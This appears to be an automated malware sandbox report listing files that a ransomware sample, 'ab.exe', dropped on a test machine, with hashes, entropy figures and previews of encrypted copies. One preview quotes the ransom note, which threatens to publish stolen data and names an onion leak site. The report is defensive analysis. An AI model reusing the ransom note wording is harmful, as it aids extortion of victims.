C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976243017495167
Encrypted:	false
SSDEEP:	192:H3tO90IFcemEsETYhqGZwaUA67YqXEz4FmaCTNbDV+n:W0xem/1ZUo8TFlCBb0
MD5:	45C14B3608A85F81FDB9826258B3A2EF
SHA1:	6EC31E06CE0D4E5788FF3C06C8FE0680C4883DB1
SHA-256:	D05C6A4EBEAFDCC076CD3F15FD0588D2F51917BEE7936383F846F6F4D5C4C5D4
SHA-512:	9D4B75874A91717265EEDB5B13015A23B8FA39B4C5E0A015AC08DE56AA7C0F062EDC76748C873793F83509F07839AD6E0FFC3DBAC70BF080F04D148D84CB4A6E
Malicious:	false
Preview:	.q....aX....o.rfv^..G.z...m...................S.(.-.M.V....4.I..X...V...c.2.?....]..M...vn).....&_.b0....:.KJ.r.....2....oc.fu........NP.(..e."...W..H....~..;.Nx.B...P...".[.NM.+j..R...f..r7+./)K.L.S..;.O.z.j..>..7.Nni.6.~...>8.%..s.aQ.....D.=..nR~....rp.......U.....3...r5;.'..V\..!Q..5.0>>E.....g.V.+.hl'..V.<..~sSQ.c.^...fs4+.R7'.......y~;T.;.._.l.>..r(...2r.\C}.'D..=y...S.[.,L[.1..4YJ.wm.."...........A.5.G]...z>.R...'.O....%...^.'A.D^A.....\S..e...M8..p...M.=.._..z...q...A..5. /Iq.BN.N.....N.a..e\..G..:e..~....JW.....f.Z\|<P....4l..rV...>>...&.~..9=....&...=..wLZVG..6j,S.W"R..S..@.K9.-....}2n$..f#...H.-Cp.g.......<].YSi...F..jt.K.A.>..khe./X...<.fc.,.X....]!.0....L........M..C@...0.X.#x#u.3.CA.....9..X.B.1..6L.LR<...^.....H,d.....7....1.Hn.x.!.+..v..>....-.X..w.D.els..y..%..)\|.8.,....x..%.9..q+..O..F`R.u...w[.rt.........Q.bzc.jU..^[J.-.-..I..l.'.<..~;%.w..0.5....1-.Y......).W..s....9.~.V...C.....'j....q...)G-.............v.....+...

C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979914364379438
Encrypted:	false
SSDEEP:	192:65doJBeuD/TEEaWMOVPkCmE9Gy4sY/SIMvlgV+n:moHeuD7EEWUPdzwSIMNZ
MD5:	2FB1513EDEFA0C8EF8AE7C8AB410049F
SHA1:	3AFF715E3EDFCBEE3801A6D81088875B2E941C9C
SHA-256:	DDDE7183DA60E6526499CDF42FBEA175FCCC2DC61B64A59DD94E08D0B0DDC8F2
SHA-512:	0E6C46B7457C5472120757FABDE9C2134E652D76DF5BE11A51063D18FE63AC38F06CA613A6BE6FFF9399A491C275627360E723152C702974F7E1E3AF2BC0763F
Malicious:	false
Preview:	A..T.[.OW.w...m....v..(.!.,.Gc..r...E.t....+V.`....~.w.e...A.....+XW...Xow.>(.!u.RX.........p...[.\|.y..T...>...R.4O\|.q.;.\U..\.?k.h..1!.....&=....c.:sFG..~..MZ.{E5...&..L....e...Y..IY.e..m.Q<.X..... p5M].7e.P...y..da.YRX6..@..:...M[..&.O..3.n..~C...........oWK..sW.-......=.]...Q_../%`...'..-.;q..yR=....mh.p.}=....7R.. `...2..c.~.N....D..PI....Q..].D......./.........lT`......^)....;aIF...^.N.....@..g.<ag.L....Q.$u bd....`.,.`6....-_.....S.Q......&W..ZS7[.n.P..>\|.y...n..fZ..._c.]...&....5..k#2$.'.......8.n......T7}.zHcf..@Y..4.5..7rt-.1...LnL.h.......pe...c[.z...dQ..r...._...P?.......9...pH7H..5.UO..X9.J.).RK.M.4..R....k..Ak.t.j...}.&.{#6..1+K a.d...".O3...+:.^...?......@,mB.b....q..4l...at.... ... Q:@....,......Y...o.u............,'......l0..c.3.........(....\|...@..].=.>.^D....}E......P1W.Y.....M..b...9.............(.....<.=..1!..z....V.]x.I9....k?..DEEB..B[!I..>......}R.u..["lQ;-.P..[....\>]%0B~:....z....P...\nI..t.Jr[.......N.R.v

C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979914364379438
Encrypted:	false
SSDEEP:	192:65doJBeuD/TEEaWMOVPkCmE9Gy4sY/SIMvlgV+n:moHeuD7EEWUPdzwSIMNZ
MD5:	2FB1513EDEFA0C8EF8AE7C8AB410049F
SHA1:	3AFF715E3EDFCBEE3801A6D81088875B2E941C9C
SHA-256:	DDDE7183DA60E6526499CDF42FBEA175FCCC2DC61B64A59DD94E08D0B0DDC8F2
SHA-512:	0E6C46B7457C5472120757FABDE9C2134E652D76DF5BE11A51063D18FE63AC38F06CA613A6BE6FFF9399A491C275627360E723152C702974F7E1E3AF2BC0763F
Malicious:	false
Preview:	A..T.[.OW.w...m....v..(.!.,.Gc..r...E.t....+V.`....~.w.e...A.....+XW...Xow.>(.!u.RX.........p...[.\|.y..T...>...R.4O\|.q.;.\U..\.?k.h..1!.....&=....c.:sFG..~..MZ.{E5...&..L....e...Y..IY.e..m.Q<.X..... p5M].7e.P...y..da.YRX6..@..:...M[..&.O..3.n..~C...........oWK..sW.-......=.]...Q_../%`...'..-.;q..yR=....mh.p.}=....7R.. `...2..c.~.N....D..PI....Q..].D......./.........lT`......^)....;aIF...^.N.....@..g.<ag.L....Q.$u bd....`.,.`6....-_.....S.Q......&W..ZS7[.n.P..>\|.y...n..fZ..._c.]...&....5..k#2$.'.......8.n......T7}.zHcf..@Y..4.5..7rt-.1...LnL.h.......pe...c[.z...dQ..r...._...P?.......9...pH7H..5.UO..X9.J.).RK.M.4..R....k..Ak.t.j...}.&.{#6..1+K a.d...".O3...+:.^...?......@,mB.b....q..4l...at.... ... Q:@....,......Y...o.u............,'......l0..c.3.........(....\|...@..].=.>.^D....}E......P1W.Y.....M..b...9.............(.....<.=..1!..z....V.]x.I9....k?..DEEB..B[!I..>......}R.u..["lQ;-.P..[....\>]%0B~:....z....P...\nI..t.Jr[.......N.R.v

C:\Users\user\Desktop\LSBIHQFDVT\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3762
Entropy (8bit):	5.731391626840331
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69H:L95zhLNbXGZUe7Ka6pU6i9fLrvE69UST
MD5:	C75AC33345088DA90A7527CE91E7D9B6
SHA1:	89F6095CA18A0C9BB57C79E727B66DF2A36459D3
SHA-256:	89ACED8641EBD571391EBECFF4C6665B49068038712135392F066BF095D99042
SHA-512:	5C159E68B9AB5EFBFA09E57AD65A3081C0A2EB5A1056767681EEB30391AF7524F7F24C2706858B74465086E411D91AF498C266FCF265D87ADF6C4C7BC77A3CED
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Desktop\PALRGUCVEH.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976748120492981
Encrypted:	false
SSDEEP:	192:3rrR909YAleD4ivG8ZmhnazUi+Sj8GTaV+n:pmeAvcGkDoNSjj
MD5:	BA1115F85960C4D0C9DE6123AFF2CF8D
SHA1:	B37463FCAEB0219662C02E6C8939AC3922511321
SHA-256:	6FFADFAA4EBE727073EA18AC9CA1FC5E915D7C4A433D9B7E89F608741967F0EE
SHA-512:	A6FF88435D43913C9E5280232490E1D6AE2167BDBF740ED4E2A28015EBEFC5B10AE5E31EF6EF153276A209C3FE8667562988D01FAE560949AE3C3EF1BBF035F0
Malicious:	false
Preview:	C.......E...&........... .9.17.......P..J.Hfd...n...,.kB...5.Q..%a.R.....[..r...Du......uh7$T...[..M..j....z....?. .r........-.".aks...N...R....Q.@.d......G..ZUQ.\|.=.0P.r.0v...wKi...K..4......"....y<~a.d..w.k...m.+{d......:f..0..D.7.....v..._l.e.>...c.$?.W.v8.j....".r..0.Uu.gY`]6.3.;..gl...X@6.....W..D3..f...6.....O...38.....5..&.\.2k....?.......x.;..S...?t.7!V...eY...._.8.C..se~.o....y.u.cQ.\c.u..sc...r...h.......{...R.`..+..G.3..%3E.;>#....`.B..TV.YEj~.:...Vf............?..\|6.T.X.d..a.dK.<. ...5....Y%[..C5H".....N..d-.J.....gU.(..W.."S.u.....en.P........Q..@}....TpS..jm8..v..D@S.<b.r..1Y..r=...9...'..1B$.]...H.h...8.`..].L...f.c.PZC......#.....Y....L..#.....E.}.~...e.{.(..G.......F...-.L.6/~...z...~..c...zeD..hD.kW.q.4.....~..!.1[UES..../K.7.n...?Hp.a.z$.L..9.......1.z........!C....,.+.N0.^..J!/NB..040...^.h..0.)......c...a.:..SVS.'..3.}A.Et........4...N...\m.+.....1.m..P.o...95...\L..n4....*..uK.].k.]...,.....X9.......ia.....a..

C:\Users\user\Desktop\PALRGUCVEH.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976748120492981
Encrypted:	false
SSDEEP:	192:3rrR909YAleD4ivG8ZmhnazUi+Sj8GTaV+n:pmeAvcGkDoNSjj
MD5:	BA1115F85960C4D0C9DE6123AFF2CF8D
SHA1:	B37463FCAEB0219662C02E6C8939AC3922511321
SHA-256:	6FFADFAA4EBE727073EA18AC9CA1FC5E915D7C4A433D9B7E89F608741967F0EE
SHA-512:	A6FF88435D43913C9E5280232490E1D6AE2167BDBF740ED4E2A28015EBEFC5B10AE5E31EF6EF153276A209C3FE8667562988D01FAE560949AE3C3EF1BBF035F0
Malicious:	false
Preview:	C.......E...&........... .9.17.......P..J.Hfd...n...,.kB...5.Q..%a.R.....[..r...Du......uh7$T...[..M..j....z....?. .r........-.".aks...N...R....Q.@.d......G..ZUQ.\|.=.0P.r.0v...wKi...K..4......"....y<~a.d..w.k...m.+{d......:f..0..D.7.....v..._l.e.>...c.$?.W.v8.j....".r..0.Uu.gY`]6.3.;..gl...X@6.....W..D3..f...6.....O...38.....5..&.\.2k....?.......x.;..S...?t.7!V...eY...._.8.C..se~.o....y.u.cQ.\c.u..sc...r...h.......{...R.`..+..G.3..%3E.;>#....`.B..TV.YEj~.:...Vf............?..\|6.T.X.d..a.dK.<. ...5....Y%[..C5H".....N..d-.J.....gU.(..W.."S.u.....en.P........Q..@}....TpS..jm8..v..D@S.<b.r..1Y..r=...9...'..1B$.]...H.h...8.`..].L...f.c.PZC......#.....Y....L..#.....E.}.~...e.{.(..G.......F...-.L.6/~...z...~..c...zeD..hD.kW.q.4.....~..!.1[UES..../K.7.n...?Hp.a.z$.L..9.......1.z........!C....,.+.N0.^..J!/NB..040...^.h..0.)......c...a.:..SVS.'..3.}A.Et........4...N...\m.+.....1.m..P.o...95...\L..n4....*..uK.].k.]...,.....X9.......ia.....a..

C:\Users\user\Desktop\PWCCAWLGRE.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9812873138034055
Encrypted:	false
SSDEEP:	192:lOCDIKuuUlelrOXUXLwnytaaYfrNcH2IqrkWuGD+jSnN4RsLy4V+n:l8xelCXUL9taqhWkpGHnN4mS
MD5:	3DCD8E5F45170DEA1EC9F33642B9D569
SHA1:	B05184D94DFFFB07C370F7C468349F4D4FDCF449
SHA-256:	D8ED18B2FFDE804F4BAB77442C7EAB32B6BECA2AA6FA3A0D850DDDD29EF5AD9B
SHA-512:	3069519753509F700C1ADE63F6AECA6FDD26CFD9C2BB0B80D178151F54498BDB42B440E51DC1BAD58B8C43E296D04AF2E543713538B0E5A4D5B6EE2F228B72E9
Malicious:	false
Preview:	3....w.{..t...<z.FAs)R%.....[5.X....a...[....xE.....e..>((o+.."b......I(.?Z.5ZV.......c.....q..mJ .c......-.....A.lMy.....\.A+{..Q.W;..PA[..#G....D.w.{..g.D.Jd(...s'..^p...n..TRA.`..iE.HkH..!.\.....V.c.......\..$..!Vxa..e._..f.E....NO.bt...W.k9....Ic.s.`...X...9)ZB......r.........]...../.....F.:..2.....G.`...i\|.....O.u.p.<..:m.\|< TE.-....."..,.n.+....c.A.j.s.,o..Y.8(.}..JfN.+>#4......ZW....Fo.X."o..P..n...jD....I.B.e.....A.....Z.OZ.S.f.l.hL..?....f.;...... .....')..)..../.w.....7.[.iMvH..\.U.7%...U...BN.{......w...23,k/....D<.....>...`..l.Og41...:.vd....v@....M..,..HLg4"Tcu.(..^..T..Is.&<f[..X.mW..8!..}r...../..A.4k.[...,...9r.....e.........I.1.1.........g...h.......lN..n.,..rVO'..`.N}m...=c...a....w..."..U.a....5.O.Uh*...jm^.#{0A....\|&.^.......Uu...'`...PM....AB.........w..6"..[...K...3....[&n..F.F.h.Ggo.wv.....d...P9R...`....?}...`.}.......L...T.?G.....He.E.........`......Q...W......_.....f..n;zY.Y.......-(0.F......r..BME{.3...I..y..2

C:\Users\user\Desktop\PWCCAWLGRE.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9812873138034055
Encrypted:	false
SSDEEP:	192:lOCDIKuuUlelrOXUXLwnytaaYfrNcH2IqrkWuGD+jSnN4RsLy4V+n:l8xelCXUL9taqhWkpGHnN4mS
MD5:	3DCD8E5F45170DEA1EC9F33642B9D569
SHA1:	B05184D94DFFFB07C370F7C468349F4D4FDCF449
SHA-256:	D8ED18B2FFDE804F4BAB77442C7EAB32B6BECA2AA6FA3A0D850DDDD29EF5AD9B
SHA-512:	3069519753509F700C1ADE63F6AECA6FDD26CFD9C2BB0B80D178151F54498BDB42B440E51DC1BAD58B8C43E296D04AF2E543713538B0E5A4D5B6EE2F228B72E9
Malicious:	false
Preview:	3....w.{..t...<z.FAs)R%.....[5.X....a...[....xE.....e..>((o+.."b......I(.?Z.5ZV.......c.....q..mJ .c......-.....A.lMy.....\.A+{..Q.W;..PA[..#G....D.w.{..g.D.Jd(...s'..^p...n..TRA.`..iE.HkH..!.\.....V.c.......\..$..!Vxa..e._..f.E....NO.bt...W.k9....Ic.s.`...X...9)ZB......r.........]...../.....F.:..2.....G.`...i\|.....O.u.p.<..:m.\|< TE.-....."..,.n.+....c.A.j.s.,o..Y.8(.}..JfN.+>#4......ZW....Fo.X."o..P..n...jD....I.B.e.....A.....Z.OZ.S.f.l.hL..?....f.;...... .....')..)..../.w.....7.[.iMvH..\.U.7%...U...BN.{......w...23,k/....D<.....>...`..l.Og41...:.vd....v@....M..,..HLg4"Tcu.(..^..T..Is.&<f[..X.mW..8!..}r...../..A.4k.[...,...9r.....e.........I.1.1.........g...h.......lN..n.,..rVO'..`.N}m...=c...a....w..."..U.a....5.O.Uh*...jm^.#{0A....\|&.^.......Uu...'`...PM....AB.........w..6"..[...K...3....[&n..F.F.h.Ggo.wv.....d...P9R...`....?}...`.}.......L...T.?G.....He.E.........`......Q...W......_.....f..n;zY.Y.......-(0.F......r..BME{.3...I..y..2

C:\Users\user\Desktop\QCFWYSKMHA.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979221173148451
Encrypted:	false
SSDEEP:	192:FU3U/EwS5ET5WIouqh0FM3XcfJuFmD6+VskKO7eI23k5dAV+n:FU36EwS5mIIo1i+XcfJuj+VVWI2U5
MD5:	AC56A88E6FFF6A4D1AF96CEBA58EF941
SHA1:	82C1D65E7DA21727ACE9626C35F73C5B6A36A306
SHA-256:	F4599CC6F6A84D56A6E25B0027A732B051A1FEA4080A4133EC91194EFF978079
SHA-512:	72453A2FAFAF87B9BB59AB83F28813E120977EE765C66163AB23A77862565BEEECCECD76FEBAEF8ED6F7E5C60251ED41BFF344BBE3503C9A782A69211AD38329
Malicious:	false
Preview:	m....~2..:P.A..E_c..#....*.}.M....y..9...1..3..\..B.....).fL......S.......].Rgg.rA._V..n.u......h.T@.R..\0....`R ..xS3^\|...B...L0.D).0...>(O8.../....^ES...G..S.YH...} ..t....8......)>e..f...'=b.sZ.....9C..s^.z.dpA.1...K.l.+.i..ua.....h.q...l..T......z..ZA;B.?q...JY.l...K...N.a..N........;..).Pi.$..V..i`~...l.8.....C.m..=.x...V.`.C.O..rg)9......x.BwUk..NA...nq....o.D.h.m/....%.cO.B.3..dsQz......q...yS.J.D+~. ....)/.M...v@>\.=I5..C.%~/.......o..n........sr.....4y..%..:..@...X.Gxt.f..y.9..ab}.-_..,.!T..8$....../.(:<.;.._...} <...........$....y.q...~`@.Ovt?-...9.q..<.D..."....'..u..~dXB...Vm.X2........A=f84.e....{..E.z...[ ,.a.I......@L.>x..Ac...W.5D..TSPT...H.T.BJ.4I....t...<.?.h..i/-.b...8.xC7.A.Z~n....S....).,.:../..G...@%...8..?.....7xrr...n...{.An.=f...r.?0.....GT...}8..4.M=gY......3...N=s\|'...%A...>n.&.(X......b...7..L.....e"..X.t-O>z)..@.f..nv..d...w.9#..y..w.F{.......208.[^'.J..{(..:2...,...zl...iR..nL.8.."@o.....%[..9.....PCMO

C:\Users\user\Desktop\QCFWYSKMHA.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979221173148451
Encrypted:	false
SSDEEP:	192:FU3U/EwS5ET5WIouqh0FM3XcfJuFmD6+VskKO7eI23k5dAV+n:FU36EwS5mIIo1i+XcfJuj+VVWI2U5
MD5:	AC56A88E6FFF6A4D1AF96CEBA58EF941
SHA1:	82C1D65E7DA21727ACE9626C35F73C5B6A36A306
SHA-256:	F4599CC6F6A84D56A6E25B0027A732B051A1FEA4080A4133EC91194EFF978079
SHA-512:	72453A2FAFAF87B9BB59AB83F28813E120977EE765C66163AB23A77862565BEEECCECD76FEBAEF8ED6F7E5C60251ED41BFF344BBE3503C9A782A69211AD38329
Malicious:	false
Preview:	m....~2..:P.A..E_c..#....*.}.M....y..9...1..3..\..B.....).fL......S.......].Rgg.rA._V..n.u......h.T@.R..\0....`R ..xS3^\|...B...L0.D).0...>(O8.../....^ES...G..S.YH...} ..t....8......)>e..f...'=b.sZ.....9C..s^.z.dpA.1...K.l.+.i..ua.....h.q...l..T......z..ZA;B.?q...JY.l...K...N.a..N........;..).Pi.$..V..i`~...l.8.....C.m..=.x...V.`.C.O..rg)9......x.BwUk..NA...nq....o.D.h.m/....%.cO.B.3..dsQz......q...yS.J.D+~. ....)/.M...v@>\.=I5..C.%~/.......o..n........sr.....4y..%..:..@...X.Gxt.f..y.9..ab}.-_..,.!T..8$....../.(:<.;.._...} <...........$....y.q...~`@.Ovt?-...9.q..<.D..."....'..u..~dXB...Vm.X2........A=f84.e....{..E.z...[ ,.a.I......@L.>x..Ac...W.5D..TSPT...H.T.BJ.4I....t...<.?.h..i/-.b...8.xC7.A.Z~n....S....).,.:../..G...@%...8..?.....7xrr...n...{.An.=f...r.?0.....GT...}8..4.M=gY......3...N=s\|'...%A...>n.&.(X......b...7..L.....e"..X.t-O>z)..@.f..nv..d...w.9#..y..w.F{.......208.[^'.J..{(..:2...,...zl...iR..nL.8.."@o.....%[..9.....PCMO

C:\Users\user\Desktop\QCFWYSKMHA.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977860329092125
Encrypted:	false
SSDEEP:	192:aaWU3X45lr4yiRaqoPpsuRY8VQhf2afN3zuzRu4glqbV+n:GU3sdGRaqoqJ2QhfDN3zAu3J
MD5:	0611F51D2DA25AF887A58B5C9A5A41A3
SHA1:	528361487F7509797D0DC8ACBA7116423CEADB36
SHA-256:	7C9E3B1448A162AF2CC26E550E37840FF21DDCDD4A0D792CADA9E438189E94FB
SHA-512:	1884254663CB20584EA91435F269482D225BFD513BF06EAD239929DFB980E5BC8469F81205AE7495FBCE8622A3539A9F99B021A3DFD9859FA07ED63D84D6826E
Malicious:	false
Preview:	....E..5.h.Tt..n.(.sV9..2.B0..$.a..\C.....W...T.g..[.....bK..9.;u..pr.....r`....+.v.X'...:Q{..-.. ..+.]K.yD.r.vM<t.L..\|....y/.&.:.V1..V.P..w{.p......0..Py.%........@:dG.lys.m'7...,/../J.W.c.[.,...u.-m...++.].,.<.s..t...O.)..Z.....->C.......Qu.j.)N.x.....`..!....BK.WCB8..0..qR.1=.^s.B.r.ZZ.[&....jU~..........U....A.%..S..Td].yf.{....{..s..NmN.....e3.rb...g+.&G.&.$.....e..d...._.cO.+.07.....c.d..@Z..J...U..+R-.....i........7.;.D..[.Nt..~bG^f...p.+.$....)O......0.F.RP>+......?.9....6=L2...5.f..3...W.H.J...>&.,........s.....Y&..).u......+...}...$......iz"... ...uk......".K..K.T.......2....q.j..G.b..q...$.:A...LB........;.zt...st..\ .q4...8;,...f....66.Q4..D.Cp.^...?.9B.9A.1.....5..J.f..K.......;.c.BX.A5...o .C....0. .o.u+..r.D.l.Dg.k.....mE...h8...b~L..4Y.{...<2c7.)b.. .6.....pfU'B..#.l.Q....]... ..B.C..d.dv&f.L.;.}.U.........._.R3~..{M._...<I..U.....J".<.......?*P..r..F.G..7..vcQ".r.....'^..v.......ywtPL.I..F.."....L.]zc........`?wgu..s

C:\Users\user\Desktop\QCFWYSKMHA.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977860329092125
Encrypted:	false
SSDEEP:	192:aaWU3X45lr4yiRaqoPpsuRY8VQhf2afN3zuzRu4glqbV+n:GU3sdGRaqoqJ2QhfDN3zAu3J
MD5:	0611F51D2DA25AF887A58B5C9A5A41A3
SHA1:	528361487F7509797D0DC8ACBA7116423CEADB36
SHA-256:	7C9E3B1448A162AF2CC26E550E37840FF21DDCDD4A0D792CADA9E438189E94FB
SHA-512:	1884254663CB20584EA91435F269482D225BFD513BF06EAD239929DFB980E5BC8469F81205AE7495FBCE8622A3539A9F99B021A3DFD9859FA07ED63D84D6826E
Malicious:	false
Preview:	....E..5.h.Tt..n.(.sV9..2.B0..$.a..\C.....W...T.g..[.....bK..9.;u..pr.....r`....+.v.X'...:Q{..-.. ..+.]K.yD.r.vM<t.L..\|....y/.&.:.V1..V.P..w{.p......0..Py.%........@:dG.lys.m'7...,/../J.W.c.[.,...u.-m...++.].,.<.s..t...O.)..Z.....->C.......Qu.j.)N.x.....`..!....BK.WCB8..0..qR.1=.^s.B.r.ZZ.[&....jU~..........U....A.%..S..Td].yf.{....{..s..NmN.....e3.rb...g+.&G.&.$.....e..d...._.cO.+.07.....c.d..@Z..J...U..+R-.....i........7.;.D..[.Nt..~bG^f...p.+.$....)O......0.F.RP>+......?.9....6=L2...5.f..3...W.H.J...>&.,........s.....Y&..).u......+...}...$......iz"... ...uk......".K..K.T.......2....q.j..G.b..q...$.:A...LB........;.zt...st..\ .q4...8;,...f....66.Q4..D.Cp.^...?.9B.9A.1.....5..J.f..K.......;.c.BX.A5...o .C....0. .o.u+..r.D.l.Dg.k.....mE...h8...b~L..4Y.{...<2c7.)b.. .6.....pfU'B..#.l.Q....]... ..B.C..d.dv&f.L.;.}.U.........._.R3~..{M._...<I..U.....J".<.......?*P..r..F.G..7..vcQ".r.....'^..v.......ywtPL.I..F.."....L.]zc........`?wgu..s

C:\Users\user\Desktop\QNCYCDFIJJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978547796797249
Encrypted:	false
SSDEEP:	192:4mgdiDazuDUBBF8oj47J2PLk4moGHsWb0MV+n:4rymuDqBB47AjkuiU
MD5:	1AF33DC577EC48E7265C09F31EDA0AAA
SHA1:	E1C19E4F2FD86772160856AFFB9E27E885E9395D
SHA-256:	3B40A5C77E644B5CC5A4149547E12F756A6248D13D3C9225D49E042D23DF94AC
SHA-512:	2CA3B078808E86356ECB66C35AAEC4BCFA0559A85F1D5B4C540EE8B41F59B1F6B80E2AB14059E8A56FDF1B5548EADF59F3B4A7EDAA85031C2066BD34C35A5231
Malicious:	false
Preview:	..?.....<..~..6..e...w0.....h?..L}.QAc;......V.[...?...R..j1..........,...R.gL..hR:.K.S.mv..YtR..L.)...3.zN=<K......m.k.]c/..3.......+......$.IlgF.J..6&P.r..nq{..^{`)..dl.q.7.........m.D. V<....aE..j.@..FN.....2d.`:.d.5&i.(I}...7m..o....@..m....P.=x.s........o.{6....5...N.E&..b.j...JQQ&..4L_..5...a..r.&w..L$r...)......!.gb(....0......+ .8....qP..q>p..Nwz.(b.A$X.6.....\L....u...Fd..(...{.'.y.h4..:6..N._........?.s`J.(._.......c.[...C.'t8>..-qh.z/....I....#.I.Du...:O.E....hR..G"lg.}.q..k..[Z.'..k..l..#.:HzP.C.8..%qf>..B..%.Fk..\|.G.Vvh.3...5.xW.1Oh..h..`....X.&WJ..R..._.j..Y......XN.w...W@.O%./....E.Fs..i.t.(....{."......K......S..i......PMq..f.CYV.z....`.[S..'4.u,H..a.;...g..0p=..$.YR...j..1...AY#J..ODZ\|...O.6yM.V3..(i.`?......(.@....n.7..+.?.s5....z.......E6.:..$.-..8Ei.5Y.raL..y.s..]x.e...2.vA....q.3.\|..g..]..f.......3....=.......F......v"L.T.1...d...6\|.";..*.$../b.........h..-G..dO@........n..f?...8W..G...._7...u.....xz...T..

C:\Users\user\Desktop\QNCYCDFIJJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978547796797249
Encrypted:	false
SSDEEP:	192:4mgdiDazuDUBBF8oj47J2PLk4moGHsWb0MV+n:4rymuDqBB47AjkuiU
MD5:	1AF33DC577EC48E7265C09F31EDA0AAA
SHA1:	E1C19E4F2FD86772160856AFFB9E27E885E9395D
SHA-256:	3B40A5C77E644B5CC5A4149547E12F756A6248D13D3C9225D49E042D23DF94AC
SHA-512:	2CA3B078808E86356ECB66C35AAEC4BCFA0559A85F1D5B4C540EE8B41F59B1F6B80E2AB14059E8A56FDF1B5548EADF59F3B4A7EDAA85031C2066BD34C35A5231
Malicious:	false
Preview:	..?.....<..~..6..e...w0.....h?..L}.QAc;......V.[...?...R..j1..........,...R.gL..hR:.K.S.mv..YtR..L.)...3.zN=<K......m.k.]c/..3.......+......$.IlgF.J..6&P.r..nq{..^{`)..dl.q.7.........m.D. V<....aE..j.@..FN.....2d.`:.d.5&i.(I}...7m..o....@..m....P.=x.s........o.{6....5...N.E&..b.j...JQQ&..4L_..5...a..r.&w..L$r...)......!.gb(....0......+ .8....qP..q>p..Nwz.(b.A$X.6.....\L....u...Fd..(...{.'.y.h4..:6..N._........?.s`J.(._.......c.[...C.'t8>..-qh.z/....I....#.I.Du...:O.E....hR..G"lg.}.q..k..[Z.'..k..l..#.:HzP.C.8..%qf>..B..%.Fk..\|.G.Vvh.3...5.xW.1Oh..h..`....X.&WJ..R..._.j..Y......XN.w...W@.O%./....E.Fs..i.t.(....{."......K......S..i......PMq..f.CYV.z....`.[S..'4.u,H..a.;...g..0p=..$.YR...j..1...AY#J..ODZ\|...O.6yM.V3..(i.`?......(.@....n.7..+.?.s5....z.......E6.:..$.-..8Ei.5Y.raL..y.s..]x.e...2.vA....q.3.\|..g..]..f.......3....=.......F......v"L.T.1...d...6\|.";..*.$../b.........h..-G..dO@........n..f?...8W..G...._7...u.....xz...T..

C:\Users\user\Desktop\QNCYCDFIJJ.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980538899760363
Encrypted:	false
SSDEEP:	192:ZAE4/1zdV9XFMaEhv3ZorCLLH6Qvu9I6X2Zn+a9PyG/wuF2csvV+n:Zop4am/ZorC/HRvu9IWSnFyG/wun
MD5:	9CC5974F5685D94A4F42A3BCD8D17FCE
SHA1:	177F93B0C98EE538D2088DEC3ABA28F180545B5E
SHA-256:	3A2E4553302AD38E338B6E291F2ADD041E1AC5C59248AEFA1F2BEEDB44D444C5
SHA-512:	FDF7A1F89C847CB4AE155568ECC66D9515C7F7727C9F3E960DF7B45EFBD4F4F40D0AE4156DEC3B7F7C14FF9D558D460BE8CDB5E256A607AAA6B217362F0440AF
Malicious:	false
